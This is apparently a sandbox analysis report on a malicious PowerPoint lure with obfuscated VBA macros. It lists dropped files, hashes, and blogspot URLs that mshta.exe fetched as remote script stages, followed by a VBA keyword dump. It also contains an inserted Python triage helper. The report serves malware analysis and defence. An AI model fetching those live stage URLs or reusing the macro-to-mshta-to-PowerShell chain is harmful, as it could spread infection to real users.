SHA-256:0906CE83C6E40BB3EBDF2A2B648EB735E3EA53B75C16367EF1BB6930FD67E8EC
SHA-512:B28BF5C412AF04A32975989C366E4D20DCE253EAD5022A34F1413DD46772483C2B114ABB7560FC19B248E8BAE866AE71DD771E96922BE047083DCE05F7CDCB47
Malicious:false
IE Cache URL:https://mainjigijigi123.blogspot.com/p/st2222.html
Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en-GB'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://mainjigijigi123.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://mainjigijigi123.blogspot.com/p/st2222.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="mainjigijigi - Atom" href="https://mainjigijigi123.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="mainjigijigi - RSS" href="https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="mainjigijigi - Atom" href="https://www.blogger.com/feeds/9116518222795791100/posts/default" />. [if IE]><script type="text/j
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\stback1[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33773
                                                                                                                                                                                                            Entropy (8bit):5.536280135344462
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:itNq3eyHHvPWdCPJS2vc26nu5AkXnVgshXt+2SYn:itNq3LHH2dCPE2ZKu5AYgshXt/
                                                                                                                                                                                                            MD5:AD61696C5A1D04015DF2FF3709BD5E0D
                                                                                                                                                                                                            SHA1:73F6B22D0B12930A32CA6DFE19FE8D4A46F2E39D
                                                                                                                                                                                                            SHA-256:97CE2ADA8A44A9A8F2CCA726172792B2080B341254D2350DD56E4D5AD75B210C
                                                                                                                                                                                                            SHA-512:4111C05D9B591251A533DA1470DC6D7D00F421065A95F7FA5DF1B721C1C516DC456BE228F0FE18638F986201BE47AA51DE5D70E23B44AA5298196E45F1A4B87D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://backbones1234511a.blogspot.com/p/stback1.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://backbones1234511a.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://backbones1234511a.blogspot.com/p/stback1.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="backbones - Atom" href="https://backbones1234511a.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="backbones - RSS" href="https://backbones1234511a.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="backbones - Atom" href="https://www.blogger.com/feeds/7680886694920034828/posts/default" />. [if IE]><script type="text/java
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNK
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 13 20:43:35 2021, length=104448, window=hide
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2138
                                                                                                                                                                                                            Entropy (8bit):4.558696032471506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:8TZ/XT0jkgX2nhO7Qh2TZ/XT0jkgX2nhO7Q/:8TZ/Xojk22E7Qh2TZ/Xojk22E7Q/
                                                                                                                                                                                                            MD5:D8B2787B913D71E0A0A5163A1FC63967
                                                                                                                                                                                                            SHA1:A7FE3DF765FDAB05C4BE82F0AB63B0F1BD3425C3
                                                                                                                                                                                                            SHA-256:F078FBE707E4D6C86A3DFCC8B175F978505C3A2DE77651BBCB799788A377BC1F
                                                                                                                                                                                                            SHA-512:30116C07A1B500ED664147BFAFDF228427E009DA10EC22CDA300FD1F3759A7B719BD27B3F48415F56B1968F0C67169B269830C15F8640DCCA36EF702CC441813
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: L..................F.... ....d..{...d..{..n^.%.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....-Rr. .BANKSW~1.PPT..`.......Q.y.Q.y*...8.....................B.a.n.k.S.w.i.f.t.C.o.p.y.U.S.D.9.5.0.0.0...p.p.t.......................-...8...[............?J......C:\Users\..#...................\\226546\Users.user\Desktop\BankSwiftCopyUSD95000.ppt.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.a.n.k.S.w.i.f.t.C.o.p.y.U.S.D.9.5.0.0.0...p.p.t.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226546.........
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101
                                                                                                                                                                                                            Entropy (8bit):4.605215508179514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:e1E61Qcw2DhU/7Qcw2DhUmZ1E61Qcw2DhUv:e1C2FAC2F1C2F2
                                                                                                                                                                                                            MD5:5BB7084F6E424324054C931281C6DF42
                                                                                                                                                                                                            SHA1:DC56F7830AC51ADA1C311EED0BB358BB0459B680
                                                                                                                                                                                                            SHA-256:D89D12C522386DBDFF572982BDC69C10664078538D4AB16FA871FB81034DF01D
                                                                                                                                                                                                            SHA-512:F801ACE22A36CC0521F73B51198177F974AB9C0CC9FD1F66EB2B7A7EDCAF915C791361B5C76DDBA840C6AD0B367E110EC776CD9B003AEBFD92DA603205C4F011
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: [ppt]..BankSwiftCopyUSD95000.LNK=0..BankSwiftCopyUSD95000.LNK=0..[ppt]..BankSwiftCopyUSD95000.LNK=0..
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0C80LKLL3RNFORU629R4.temp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.5869379648879183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzbKKr8PHmZqR/MlUV/Iu:cyko1z8ywHnorbzbPxZqRPIu
                                                                                                                                                                                                            MD5:D62CC9CCF77316A2AA6A729F57925D11
                                                                                                                                                                                                            SHA1:00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC
                                                                                                                                                                                                            SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
                                                                                                                                                                                                            SHA-512:8480FC261FDFF51E9BC8B9345A8532408E699FD60FF6A354B01E7DCCCC6F7AF991A8840790344B042029656AF0EFBB450E90DAA3A24E371EC4E3CC458B70FAF2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3U3Q2FM73WBY1UE104TU.temp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.5869379648879183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzbKKr8PHmZqR/MlUV/Iu:cyko1z8ywHnorbzbPxZqRPIu
                                                                                                                                                                                                            MD5:D62CC9CCF77316A2AA6A729F57925D11
                                                                                                                                                                                                            SHA1:00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC
                                                                                                                                                                                                            SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
                                                                                                                                                                                                            SHA-512:8480FC261FDFF51E9BC8B9345A8532408E699FD60FF6A354B01E7DCCCC6F7AF991A8840790344B042029656AF0EFBB450E90DAA3A24E371EC4E3CC458B70FAF2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8I74OU51TKSDH4DLI8O.temp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.585483093071589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzkKY2PHmxyR/MlUV/Iu:cyko1z8ywHnorbzktxyRPIu
                                                                                                                                                                                                            MD5:CFED356B7D3C67E02B444A42748C9C30
                                                                                                                                                                                                            SHA1:9F8F99098E818E40DEF5CEBB79D6750E4218CA39
                                                                                                                                                                                                            SHA-256:DF469FB95559F0412C9AF5C3AD77C12F276241ABABF606D60695F40BABCBAF56
                                                                                                                                                                                                            SHA-512:C3B154749C955D91EE2B3577987FEF327EBBA37ED07FC3CFF97169F73CC7CB1A22DD38D85E320DE6302485FF806206B8D3698B59CACF4E95074C8D7A94B50221
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K99IMC5JY7YG7OEZH6Y6.temp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.5869379648879183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzbKKr8PHmZqR/MlUV/Iu:cyko1z8ywHnorbzbPxZqRPIu
                                                                                                                                                                                                            MD5:D62CC9CCF77316A2AA6A729F57925D11
                                                                                                                                                                                                            SHA1:00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC
                                                                                                                                                                                                            SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
                                                                                                                                                                                                            SHA-512:8480FC261FDFF51E9BC8B9345A8532408E699FD60FF6A354B01E7DCCCC6F7AF991A8840790344B042029656AF0EFBB450E90DAA3A24E371EC4E3CC458B70FAF2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
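The listing above is a flat run of Key:Value lines, one block per dropped file, and the same questions come up every time: which of these files are bit-identical copies, which ones did mshta.exe pull from the network, and does the file content the preview shows actually match the entropy the report prints. The helper below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It parses that record format, groups records by SHA-256, lists the mshta.exe downloads with their cache URL, and recomputes the 8-bit Shannon entropy of index.dat. The excerpt it runs on is constructed from five records above (paths, process names, hashes and URL copied from the report, other fields dropped); the index.dat bytes are a reconstruction that assumes each dot in the preview stands for one CR or LF byte, which is consistent with the reported file type and the 101-byte size.

```python
"""Triage helper for a sandbox "Dropped Files" listing (added example, not
part of the report).  Parses the flat Key:Value records, collapses duplicate
content by SHA-256, lists what mshta.exe fetched, and recomputes the 8-bit
Shannon entropy for a file whose content is fully visible in its preview."""
import math
from collections import Counter

# Field names as printed in the report.  Any other non-empty line starts a
# new record and is taken to be the dropped file's path.
FIELD_KEYS = {
    "Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)",
    "Encrypted", "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512", "Malicious",
    "IE Cache URL", "Preview",
}

# Constructed excerpt: five records from the listing, trimmed to the fields
# this helper uses (hashes, process names and the URL are as reported).
REPORT_EXCERPT = r"""
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\stback1[1].htm
Process:C:\Windows\System32\mshta.exe
Category:downloaded
SHA-256:97CE2ADA8A44A9A8F2CCA726172792B2080B341254D2350DD56E4D5AD75B210C
IE Cache URL:https://backbones1234511a.blogspot.com/p/stback1.html
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Category:dropped
SHA-256:D89D12C522386DBDFF572982BDC69C10664078538D4AB16FA871FB81034DF01D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0C80LKLL3RNFORU629R4.temp
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Category:dropped
SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3U3Q2FM73WBY1UE104TU.temp
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Category:dropped
SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8I74OU51TKSDH4DLI8O.temp
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Category:dropped
SHA-256:DF469FB95559F0412C9AF5C3AD77C12F276241ABABF606D60695F40BABCBAF56
"""


def parse_dropped_files(text):
    """Turn the flat listing into one dict per dropped file."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if sep and key in FIELD_KEYS:
            if not records:
                raise ValueError("field line before any file path: " + line)
            records[-1][key] = value.strip()
        else:
            # A path such as C:\Users\... also contains ':' but its "key"
            # ("C") is not a report field, so it opens a new record.
            records.append({"path": line})
    return records


def group_by_sha256(records):
    """Map each SHA-256 to the paths carrying it; identical files collapse."""
    groups = {}
    for rec in records:
        sha = rec.get("SHA-256")
        if sha:
            groups.setdefault(sha.upper(), []).append(rec["path"])
    return groups


def mshta_downloads(records):
    """(path, url) for files mshta.exe wrote from a URL: the remote script
    stages that keep the chain alive and are worth pulling for analysis."""
    hits = []
    for rec in records:
        proc = rec.get("Process", "").lower()
        if proc.endswith("\\mshta.exe") and rec.get("Category") == "downloaded":
            hits.append((rec["path"], rec.get("IE Cache URL", "")))
    return hits


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the figure the report prints."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# index.dat rebuilt from its preview (assumption: each preview dot is one CR
# or LF byte).  The result is exactly the 101 bytes the report lists.
INDEX_DAT = (b"[ppt]\r\n"
             + b"BankSwiftCopyUSD95000.LNK=0\r\n" * 2
             + b"[ppt]\r\n"
             + b"BankSwiftCopyUSD95000.LNK=0\r\n")


if __name__ == "__main__":
    recs = parse_dropped_files(REPORT_EXCERPT)
    for sha, paths in group_by_sha256(recs).items():
        if len(paths) > 1:
            print("identical content %s... in %d files" % (sha[:16], len(paths)))
    for path, url in mshta_downloads(recs):
        print("mshta.exe fetched", url, "->", path)
    print("%d bytes, entropy %.6f" % (len(INDEX_DAT), shannon_entropy(INDEX_DAT)))
```

Run against the excerpt, the grouping shows two of the three CustomDestinations .temp files as bit-identical (jump-list fragments the PowerShell host writes on start, not payloads), the only mshta.exe download resolves to the backbones1234511a.blogspot.com page, and the reconstructed index.dat gives an entropy of 4.605215, matching the report's 4.605215508 and confirming the dot-for-CRLF reading of the preview.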

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: U2, Last Saved By: Master Mana, Revision Number: 3, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 03:01, Create Time/Date: Tue Jan 12 20:38:51 2021, Last Saved Time/Date: Tue Jan 12 20:41:52 2021, Number of Words: 0
Entropy (8bit):3.52446566989119
TrID:
• Microsoft PowerPoint document (31509/1) 79.74%
• Generic OLE2 / Multistream Compound File (8008/1) 20.26%
File name:BankSwiftCopyUSD95000.ppt
File size:101888
MD5:7f0b415d0b7a76530b2f510a910811e5
SHA1:480594ad26c91dd9d719c80334285375540dc83e
SHA256:8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
SHA512:d9b3320b51f390a6f75e7e3102044557e6476103c94ec4451819b78b4503f8018fee7ce8f70657473b310b14b752935fac2b7e5caaeb318e09a9af317701d8f4
SSDEEP:768:27AB11Q3bZPGYj9c8OFEvk4kemSpn0jlO23cjo:fBPuxk5LSpElO2L
File Content Preview:

File Icon

Icon Hash:e4eaeaaaa4bcbcb4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "BankSwiftCopyUSD95000.ppt"

Indicators

Has Summary Info:True
Application Name:Microsoft Office PowerPoint
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Code Page:1252
Title:
Author:U2
Last Saved By:Master Mana
Revision Number:3
Total Edit Time:181
Create Time:2021-01-12 20:38:51.224482
Last Saved Time:2021-01-12 20:41:52.425000
Number of Words:0
Thumbnail:
Creating Application:Microsoft Office PowerPoint

Document Summary

Document Code Page:1252
Presentation Target Format:Widescreen
Number of Bytes:0
Number of Paragraphs:0
Number of Slides:0
Number of Pages with Notes:0
Number of Hidden Slides:0
Number of Sound/Video Clips:0
Thumbnail Scaling Desired:False
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 33850
General
Stream Path:VBA/Module1
VBA File Name:Module1.bas
Stream Size:33850
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
QUGzGlLxMQTLkNscYMh
ktRMprYexFvb
VIIksEhAgEViVTNgdzju
"jaoyhhTGhDQfLe"
VQuwdxCKAgppnsP
nXgSUoXaonITwVRyRI:
wapVcvDtZTUSYIBInN
Public
decrypt("h",
Shell
pUQQPUFLTkKJaPS:
KhgHpGswQxIC
gzSmhVBKLJOzszerqGK
nXgSUoXaonITwVRyRI
"uRYf"
ktRMprYexFvb:
xfhBejwGcpdOqMLnUm:
gpzuYnFatnd:
OoOaTmjFcAsoARgBp:
kVazolfxuRnLRNadrMO()
onOwNzDeEPJcZvQqiep
decrypt("u",
"lMhLkBNCzt"
HJBbDiSOCQNESdLK
BYHSYUgxLTUeCxacIOi
bzdHFncwmdrB
While
doFUcenKFjl()
qrRbnPjNmEeEPJcKiRc()
cryKMTIhjNeuJeyeLL:
"yqPfQprLotGR"
TJAOZHHuhHerFmD
hkbAPIsadx
bzdHFncwmdrB:
qhGjOMujDtky
decrypt("q",
"TpqzJEi"
nQedtxArQgZ()
iuIqHuyYLJDVSpLkqm()
kpaSaERQhknf
"umiuKavjsPKoqQrwEtZi"
"cSgraZMyawIQ"
BYHSYUgxLTUeCxacIOi:
JKTeZCRlEYSHn
"NyrydDpFJLDdFkUPE"
huFonbMoKQlSk
OoOaTmjFcAsoARgBp
String,
eubhAIxdZZQcNGN()
OONSDwDivuKNQIhw:
bMQqfcVolHeCIEPTi
mjbRBwEkswXsnplYNF
decrypt("|",
ofmAwoLutcZuXfyhyL
"tfYfJVUlpsjIY"
FfTQKdawSrxtEIQ:
"MyORUMlOteZN"
MgzujOYZQcMFMrEDT
HlPNvkEulzJ:
GhgwmphFjNLti()
Auto_Close()
wQvTlxmjdvsPzJPLYop()
KDnVYsUanxSgTF:
FfTQKdawSrxtEIQ
DoEvents
HlPNvkEulzJ
TJAOZHHuhHerFmD:
cryKMTIhjNeuJeyeLL
xVnzolfxuRBLRNZqrMO
KDnVYsUanxSgTF
wuQEVHLmLQ
AefLgltjOYYQcyFM()
SxvdRmdTisbaN
HHQbeVuJCmTQrTYmj
JKTeZCRlEYSHn:
kpaSaERQhknf:
                                                                                                                                                                                                            JVmnIKTrZCRyEYgVBw
                                                                                                                                                                                                            "AaaA"
                                                                                                                                                                                                            MbIaLPpebUnkHdBHDP
                                                                                                                                                                                                            Currency
                                                                                                                                                                                                            IgPagcnEFbdmJqTkQQq
                                                                                                                                                                                                            bMQqfcVolHeCIEPTi:
                                                                                                                                                                                                            VQuwdxCKAgppnsP:
                                                                                                                                                                                                            "zEROxKkkLThIdHgxYyJD"
                                                                                                                                                                                                            RAznnOQjLfKjAMAys
                                                                                                                                                                                                            rpugZgKQQmqtk:
                                                                                                                                                                                                            ChtsIMPGgvoYFI:
                                                                                                                                                                                                            VIIksEhAgEViVTNgdzju:
                                                                                                                                                                                                            hHvsmECZuS()
                                                                                                                                                                                                            zEROxKkkLTgIcHgxYxIC
                                                                                                                                                                                                            JLzWDvGFm
                                                                                                                                                                                                            Integer)
                                                                                                                                                                                                            JLzWDvGFm)
                                                                                                                                                                                                            "KCzK"
                                                                                                                                                                                                            KRZDPPfjmeCRKucf
                                                                                                                                                                                                            "wsEU"
                                                                                                                                                                                                            zEROxKkkLTgIcHgxYxIC:
                                                                                                                                                                                                            ZYosumLbSDlnHkpDNi()
                                                                                                                                                                                                            CHflsQkjzDFxQmeO()
                                                                                                                                                                                                            hgkVcjAbaqg
                                                                                                                                                                                                            KTeZCRlEYSHnwxvAl
                                                                                                                                                                                                            oTPPNSEKRjJIZOR
                                                                                                                                                                                                            "mrEBkxQQ"
                                                                                                                                                                                                            yYLJDVSpLkpmxA:
                                                                                                                                                                                                            DnxDzLdezAJ:
                                                                                                                                                                                                            JVmnIKTrZCRyEYgVBw:
                                                                                                                                                                                                            piRACQzERc()
                                                                                                                                                                                                            QAPwCVeTzuvty()
                                                                                                                                                                                                            kLfKjAbAMGZHeNZfbmDS:
                                                                                                                                                                                                            Integer
                                                                                                                                                                                                            calcmm
                                                                                                                                                                                                            gpzuYnFatnd
                                                                                                                                                                                                            ofmAwoLutcZuXfyhyL:
                                                                                                                                                                                                            mjbRBwEkswXsnplYNF:
                                                                                                                                                                                                            QqQcVolIeCurCTiDrA
                                                                                                                                                                                                            aSCkmHkoCMhviUvRQ()
                                                                                                                                                                                                            Attribute
                                                                                                                                                                                                            "yQmfPxzTwBOLuHhhI"
                                                                                                                                                                                                            syuGQmtvEcQ
                                                                                                                                                                                                            DoEvents:
                                                                                                                                                                                                            ChtsIMPGgvoYFI
                                                                                                                                                                                                            JomUIdTKZjRQEEg
                                                                                                                                                                                                            HPQaytVYEKemcH
                                                                                                                                                                                                            MsgBox
                                                                                                                                                                                                            (WINWORD
                                                                                                                                                                                                            LaVESrsScoQkOnFfF:
                                                                                                                                                                                                            lyYYzHUwQvTlLmxr()
                                                                                                                                                                                                            decrypt
                                                                                                                                                                                                            VB_Name
                                                                                                                                                                                                            uYZFLfndIDECHsz:
                                                                                                                                                                                                            uYZFLfndIDECHsz
                                                                                                                                                                                                            "NpJoMeEfqkClIsC"
                                                                                                                                                                                                            FGQojMOuBUcRxstrw
                                                                                                                                                                                                            Function
                                                                                                                                                                                                            bkupSiBUoj()
                                                                                                                                                                                                            "YfvVUlbeV"
                                                                                                                                                                                                            "BYHSZUgxLTUfCxbcIPi"
                                                                                                                                                                                                            yTHQpjMOvPUdSyHH
                                                                                                                                                                                                            lelPqcswyqPsQHC:
